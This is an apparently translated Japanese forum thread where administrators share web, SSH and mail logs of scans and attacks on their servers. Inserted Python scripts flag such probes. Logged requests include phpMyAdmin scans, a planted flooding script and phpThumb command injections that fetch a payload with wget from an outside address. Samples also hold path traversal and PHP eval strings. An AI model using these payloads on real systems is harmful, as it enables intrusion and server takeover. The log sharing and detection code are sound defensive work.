68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //sqlweb/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webdb/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admm/scripts/setup.php HTTP/1.1" 404 220 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admn/scripts/setup.php HTTP/1.1" 404 220 "-" "-"
Looks like it's hunting for every phpMyAdmin version ever released.
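Added example (not written by any poster in this thread): the pattern in the log above, one client requesting many distinct phpMyAdmin-style paths within seconds and getting 4xx for all of them, can be flagged with a short Python script. The sample log lines, the RFC 5737 addresses, the signature list and the thresholds (`min_paths`, `window`) are constructed assumptions, not values from the thread.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache common/combined log line: client, [timestamp], "METHOD target ...", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})\b'
)

# Assumed probe signatures, modelled on the kinds of paths posted in this thread.
PROBE_RE = re.compile(
    r"myadmin|my-admin|mysqladmin|/pma\d*/|scripts/setup\.php|w00tw00t|muieblackcat",
    re.IGNORECASE,
)


def parse(line):
    """Return (client, timestamp, target, status), or None for unparsable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # e.g. TLS bytes sent to the HTTP port: "\x16\x03\x01" 501
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("client"), ts, m.group("target"), int(m.group("status"))


def find_scanners(lines, min_paths=5, window=timedelta(seconds=60)):
    """Map client -> largest number of distinct probe paths seen inside one window."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        client, ts, target, status = rec
        # Only failed lookups are counted; a 200 on such a path is a different,
        # more urgent finding and is not handled here.
        if 400 <= status < 500 and PROBE_RE.search(target):
            hits[client].append((ts, target))

    report = {}
    for client, events in hits.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            # Slide the left edge until the span fits inside the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({t for _, t in events[start:end + 1]}))
        if best >= min_paths:
            report[client] = best
    return report


# Constructed sample data (RFC 5737 documentation addresses), not logs from the thread.
BURST_DIRS = ["phpMyAdmin-2.11.9.0", "phpMyAdmin-3.0.0.0", "pma2005",
              "mysqladmin", "websql", "php-my-admin"]
SAMPLE_LOG = [
    # Burst: six distinct probe paths within three seconds.
    f'192.0.2.10 - - [30/Jul/2011:23:35:{24 + i // 2:02d} +0900] '
    f'"GET //{d}/scripts/setup.php HTTP/1.1" 404 235 "-" "-"'
    for i, d in enumerate(BURST_DIRS)
]
SAMPLE_LOG += [
    # Same kind of probe, one request per hour: invisible to a 60-second window.
    f'203.0.113.5 - - [31/Jul/2011:{h:02d}:00:00 +0900] '
    f'"GET /pma{h}/scripts/setup.php HTTP/1.1" 404 223 "-" "-"'
    for h in range(1, 7)
]
SAMPLE_LOG += [
    # Ordinary visitor with a single mistyped URL.
    r'198.51.100.7 - - [30/Jul/2011:23:40:00 +0900] "GET /index.html HTTP/1.1" 200 5184 "-" "Mozilla/5.0"',
    r'198.51.100.7 - - [30/Jul/2011:23:40:05 +0900] "GET /phpmyadmin/ HTTP/1.1" 404 228 "-" "Mozilla/5.0"',
    # Non-HTTP bytes logged as a request line; must be skipped, not crash the parser.
    r'192.0.2.10 - - [30/Jul/2011:23:35:27 +0900] "\x16\x03\x01" 501 951 "-" "-"',
]
BINARY_LINE = SAMPLE_LOG[-1]

if __name__ == "__main__":
    for client, count in find_scanners(SAMPLE_LOG).items():
        print(f"{client}: {count} distinct probe paths within 60 s")
```

Widening `window` (for example to 12 hours) also catches the slow prober in the sample, at the cost of more false positives on busy sites.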
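Makes no sense, lol.
>>93 Are you an idiot? Go read the thread title out loud 100 times.
>>85-92 are long,
but they show clearly how the attack came in. So they are worth having; no problem.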
>>93
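There are a lot of phpMyAdmin attacks.
This isn't an attack from outside, but... there is a BIND thread,
but there didn't seem to be a thread for DNS in general (maybe it's gone?).
A PC on our premises is sending the DNS cache
queries of the form <random string>.<domain handed out by DHCP>,
three in a row, and they show up in the log...
Some days it does this several times, other days not at all.
I can't tell what triggers it either.
NXDOMAIN comes back, of course, but it doesn't look like Kaminsky either.
No actual harm so far, but it's a little creepy.
Does anyone know anything about this?
You're an alien, aren't you? Write in an Earth language.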
99 :
DNS未登録さん:2011/08/14(Sun) 00:38:20.63 ID:mNJmTQUE
You're an Earthling, aren't you? Write in an alien language.
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:36 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:39 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
101 :
DNS未登録さん:2011/09/02(Fri) 20:25:03.05 ID:EWkDqbhU
126.26.247.186
The sdc domain is trash.
103 :
DNS未登録さん:2011/11/03(Thu) 01:26:14.18 ID:lpY38TUY
79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
They attack like this, changing the parameters each time.
Attacks from the same IP have been going on for about a week now; a reverse lookup gives
backup01.xsltel.me
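>103
If you've identified it, just block it and you're done...
This thread is an information-sharing thread, though, where you post the URIs
and circumstances of the "Attack No.1" hits you received so that everyone can use them as a reference.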
# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2
# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2
# grep 222.229.65.227 auth.log|wc
1846 25606 185870
# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227
Hang in there, admin~.
Attack 25
Got attacked 3 times, yesterday and today, from the same provider
114.51.19.152
I'm Korean; posting here to mark the occasion.
I keep getting attacked every day by some scumbag who appears to be the same person
94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
I looked up the country and it seems to be France; some French brat, maybe. I'll kill you, damn it.
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7
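>>115 The whois info says "dedicated server", so
it's probably a rented server or something.
Also, since they are exploiting a vulnerability in a tool called phpThumb()
to try to execute commands on the server,
the server in question has probably been taken over.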
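Added example (not part of any post): a Python heuristic that percent-decodes request targets like the phpThumb ones above and flags shell separators smuggled into a parameter value. It goes beyond that case and also flags the path-traversal and PHP-code patterns that appear in other requests posted in this thread; the function names, labels and sample targets are assumptions modelled on those logged requests.

```python
import re
from urllib.parse import unquote

# Shell separators that have no business in an image-filter parameter.
# A lone "|" is deliberately absent: the logged requests carry fltr[]=blur|9,
# where the pipe is part of the filter value itself.
SHELL_RE = re.compile(r";|&&|\|\||`|\$\(")
# ".." as a whole path segment (so "file..jpg" does not match).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# PHP evaluation calls or superglobals appearing inside a URL.
PHP_CODE_RE = re.compile(
    r"\b(eval|assert|system|passthru)\s*\(|\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253B) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_target(target):
    """Return a sorted list of findings for one request target (path[?query])."""
    # Split by hand: targets in these logs often start with "//", which
    # urllib.parse.urlsplit would interpret as the start of a host name.
    path, _, query = target.partition("?")
    texts = [(fully_unquote(path), False)]
    for pair in query.split("&"):
        _name, _, value = pair.partition("=")
        texts.append((fully_unquote(value.replace("+", " ")), True))

    findings = set()
    for text, is_value in texts:
        if TRAVERSAL_RE.search(text):
            findings.add("path-traversal")
        if PHP_CODE_RE.search(text):
            findings.add("php-code")
        # ";" is legal in paths (path parameters), so only values are checked.
        if is_value and SHELL_RE.search(text):
            findings.add("shell-metachar")
    return sorted(findings)


# Constructed sample targets, modelled on requests posted in this thread.
SAMPLE_TARGETS = [
    "/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9",
    "/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20;%20ls%20-l%20/tmp",
    "/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%253B%2520id",
    "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../etc/amportal.conf",
    "/index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D",
    "//phpMyAdmin/index.php",
]

if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        print(classify_target(t) or ["clean"], t)
```

These are pattern heuristics for log triage; a match means the request deserves a look, and a non-match does not prove the request was harmless.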
117 :
DNS未登録さん:2012/01/09(Mon) 07:21:01.65 ID:/sz8vKGE
IP address 175.105.126.4
Hostname 4.126.105.175.ap.yournet.ne.jp
Country of IP allocation Japan ( jp )
Area code N/A
Connection line Type unknown
Prefecture Osaka
IPひろば search ranking 17th (48Point)
78.46.89.6 (liventura-grid.com)
2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
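Followed by a hundred-odd more requests, mostly pma-related.
>>119 I wondered who on earth (doko no doitsu) would go poking at security holes,
and it turned out to be Germany (Doitsu).
Got one for the first time in a while.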
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -
>>121 The same thing came to us too, at around 13:00 and 20:00.
123 :
DNS未登録さん:2012/02/27(Mon) 15:21:12.38 ID:6b+wEirL
175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
What is this? Scary.
Korea (´・д・`) no thanks.
Part of a flood of accesses from Google.
It seems to be something different from the search bot.
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
Persistent.
Stop the vandalism.
ip:218.218.181.166
host:KYNfb-02p1-166.ppp11.odn.ad.jp
UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61
>126
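If it's domestic, send a complaint with logs to the other party's ISP. That usually settles it.
Lenient ISPs sometimes just give a warning and not much changes, though.
Strict ones cut the line off on the first offence.
I wonder how odn handled it...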
"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
There were 8000 lines. Every few seconds, for 16 hours...
64.27.15.56 USA unassigned.calpop.com
It attacks my mail server.
116.126.87.154 South Korea
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1
Plus 137 other kinds of attack
???
Port scan and cracking-tool run from within Japan
49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.
217.41.19.142
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
